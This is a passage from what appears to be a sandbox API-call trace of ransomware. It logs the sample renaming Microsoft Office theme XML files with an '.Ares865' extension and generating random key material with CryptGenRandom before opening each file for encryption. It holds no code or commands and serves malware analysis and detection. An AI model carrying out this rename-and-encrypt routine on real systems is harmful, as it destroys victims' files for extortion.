dwFlags=0x0) returned 1 [0074.049] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Hardcover.xml" | out: lpString1="Hardcover.xml") returned="Hardcover.xml" [0074.049] lstrlenW (lpString="Hardcover.xml") returned 13 [0074.049] lstrlenW (lpString="Ares865") returned 7 [0074.049] lstrcmpiW (lpString1="ver.xml", lpString2="Ares865") returned 1 [0074.049] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.Ares865") returned 87 [0074.049] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml.ares865"), dwFlags=0x1) returned 1 [0074.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Hardcover.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\hardcover.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.051] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0074.052] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.052] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.052] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.054] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.055] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.055] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.055] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Horizon.xml" | out: lpString1="Horizon.xml") returned="Horizon.xml" [0074.055] lstrlenW (lpString="Horizon.xml") returned 11 [0074.055] lstrlenW (lpString="Ares865") returned 7 [0074.055] lstrcmpiW (lpString1="zon.xml", lpString2="Ares865") returned 1 [0074.056] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.Ares865") returned 85 [0074.056] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml.ares865"), dwFlags=0x1) returned 1 [0074.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Horizon.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\horizon.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.057] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=926) returned 1 [0074.058] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.058] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.058] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.063] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.064] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.064] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.064] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Median.xml" | out: lpString1="Median.xml") returned="Median.xml" [0074.064] lstrlenW (lpString="Median.xml") returned 10 [0074.064] lstrlenW (lpString="Ares865") returned 7 [0074.064] lstrcmpiW (lpString1="ian.xml", lpString2="Ares865") returned 1 [0074.064] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.Ares865") returned 84 [0074.064] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml.ares865"), dwFlags=0x1) returned 1 [0074.066] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Median.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\median.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0074.066] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.067] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.067] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.069] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.070] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.070] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.070] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Metro.xml" | out: lpString1="Metro.xml") returned="Metro.xml" [0074.070] lstrlenW (lpString="Metro.xml") returned 9 [0074.070] lstrlenW (lpString="Ares865") returned 7 [0074.070] lstrcmpiW (lpString1="tro.xml", lpString2="Ares865") returned 1 [0074.070] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.Ares865") returned 83 [0074.071] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml.ares865"), dwFlags=0x1) returned 1 [0074.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Metro.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\metro.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.072] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0074.072] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.073] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.073] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.076] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.076] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.076] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.077] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Module.xml" | out: lpString1="Module.xml") returned="Module.xml" [0074.077] lstrlenW (lpString="Module.xml") returned 10 [0074.077] lstrlenW (lpString="Ares865") returned 7 [0074.077] lstrcmpiW (lpString1="ule.xml", lpString2="Ares865") returned 1 [0074.077] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.Ares865") returned 84 [0074.077] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml.ares865"), dwFlags=0x1) returned 1 [0074.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Module.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\module.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.079] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0074.080] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.080] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.080] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.082] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.083] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.083] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.084] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Newsprint.xml" | out: lpString1="Newsprint.xml") returned="Newsprint.xml" [0074.084] lstrlenW (lpString="Newsprint.xml") returned 13 [0074.084] lstrlenW (lpString="Ares865") returned 7 [0074.084] lstrcmpiW (lpString1="int.xml", lpString2="Ares865") returned 1 [0074.084] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.Ares865") returned 87 [0074.084] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml.ares865"), dwFlags=0x1) returned 1 [0074.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Newsprint.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\newsprint.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.085] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0074.085] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.086] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.086] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.088] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.089] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.089] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.089] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Opulent.xml" | out: lpString1="Opulent.xml") returned="Opulent.xml" [0074.089] lstrlenW (lpString="Opulent.xml") returned 11 [0074.089] lstrlenW (lpString="Ares865") returned 7 [0074.089] lstrcmpiW (lpString1="ent.xml", lpString2="Ares865") returned 1 [0074.089] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.Ares865") returned 85 [0074.090] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml.ares865"), dwFlags=0x1) returned 1 [0074.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Opulent.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\opulent.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.091] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=962) returned 1 [0074.092] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.092] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.092] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.094] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.095] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.095] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.096] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Oriel.xml" | out: lpString1="Oriel.xml") returned="Oriel.xml" [0074.096] lstrlenW (lpString="Oriel.xml") returned 9 [0074.096] lstrlenW (lpString="Ares865") returned 7 [0074.096] lstrcmpiW (lpString1="iel.xml", lpString2="Ares865") returned 1 [0074.096] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.Ares865") returned 83 [0074.096] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml.ares865"), dwFlags=0x1) returned 1 [0074.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Oriel.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\oriel.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0074.098] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.099] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.099] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.101] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.101] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.101] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.102] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Origin.xml" | out: lpString1="Origin.xml") returned="Origin.xml" [0074.102] lstrlenW (lpString="Origin.xml") returned 10 [0074.102] lstrlenW (lpString="Ares865") returned 7 [0074.102] lstrcmpiW (lpString1="gin.xml", lpString2="Ares865") returned 1 [0074.102] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.Ares865") returned 84 [0074.102] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml.ares865"), dwFlags=0x1) returned 1 [0074.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Origin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\origin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0074.105] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.105] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.105] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.107] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.108] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.108] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.108] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Paper.xml" | out: lpString1="Paper.xml") returned="Paper.xml" [0074.108] lstrlenW (lpString="Paper.xml") returned 9 [0074.108] lstrlenW (lpString="Ares865") returned 7 [0074.108] lstrcmpiW (lpString1="per.xml", lpString2="Ares865") returned 1 [0074.109] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.Ares865") returned 83 [0074.109] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml.ares865"), dwFlags=0x1) returned 1 [0074.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Paper.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\paper.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.111] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=960) returned 1 [0074.111] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.112] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.112] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.114] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.115] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.115] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.115] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Perspective.xml" | out: lpString1="Perspective.xml") returned="Perspective.xml" [0074.115] lstrlenW (lpString="Perspective.xml") returned 15 [0074.115] lstrlenW (lpString="Ares865") returned 7 [0074.115] lstrcmpiW (lpString1="ive.xml", lpString2="Ares865") returned 1 [0074.115] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.Ares865") returned 89 [0074.115] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml.ares865"), dwFlags=0x1) returned 1 [0074.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Perspective.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\perspective.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.117] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=966) returned 1 [0074.117] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.118] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.118] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.120] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.121] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.121] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.122] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Pushpin.xml" | out: lpString1="Pushpin.xml") returned="Pushpin.xml" [0074.122] lstrlenW (lpString="Pushpin.xml") returned 11 [0074.122] lstrlenW (lpString="Ares865") returned 7 [0074.122] lstrcmpiW (lpString1="pin.xml", lpString2="Ares865") returned 1 [0074.122] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.Ares865") returned 85 [0074.122] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml.ares865"), dwFlags=0x1) returned 1 [0074.123] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Pushpin.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\pushpin.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=962) returned 1 [0074.124] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.124] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.124] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.129] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.130] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.130] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.130] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Slipstream.xml" | out: lpString1="Slipstream.xml") returned="Slipstream.xml" [0074.130] lstrlenW (lpString="Slipstream.xml") returned 14 [0074.130] lstrlenW (lpString="Ares865") returned 7 [0074.130] lstrcmpiW (lpString1="eam.xml", lpString2="Ares865") returned 1 [0074.130] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml.Ares865") returned 88 [0074.130] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Slipstream.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\slipstream.xml"), 